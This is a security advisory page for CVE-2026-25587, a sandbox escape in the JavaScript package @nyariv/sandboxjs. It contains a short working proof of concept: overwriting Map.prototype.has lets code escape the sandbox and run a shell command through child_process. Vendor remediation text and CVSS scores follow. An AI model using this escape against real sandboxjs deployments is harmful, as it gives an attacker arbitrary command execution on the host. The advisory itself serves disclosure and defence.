CVE
CVE-2026-25587
@nyariv/sandboxjs has a Sandbox Escape vulnerability
Summary
As Map is in SAFE_PROTOYPES, it's prototype can be obtained via Map.prototype. By overwriting Map.prototype.has the sandbox can be escaped.
Details
This is effectively equivalent to CVE-2026-25142, but without lookupGetter (let was used during testing), it turns out the let implementation is bugged:
let a = Map.prototype;
console.log(a) // undefined
const a = Map.prototype;
console.log(a) // Object [Map] {}
let a = 123;
console.log(a) // 123
const a = 123;
console.log(a) // 123PoC
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
payload = `
const m = Map.prototype;
m.has = isFinite;
console.log(
isFinite.constructor(
"return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
)(),
);`;
sb.compile(payload)().run();Impact
Able to set Map.prototype.has -> RCE
Package Versions Affected
Package Version
patch Availability
No items found.
Automatically patch vulnerabilities without upgrading
Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request
CVSS Version
Severity
Base Score
CVSS Version
Score Vector
C
H
U
10
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
C
H
U
10
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Related Resources
No items found.
References
https://github.com/nyariv/SandboxJS/security/advisories/GHSA-66h4-qj4x-38xp, https://nvd.nist.gov/vuln/detail/CVE-2026-25587, https://github.com/nyariv/SandboxJS/commit/67cb186c41c78c51464f70405504e8ef0a6e43c3, https://github.com/nyariv/SandboxJS
Basic Information
Ecosystem
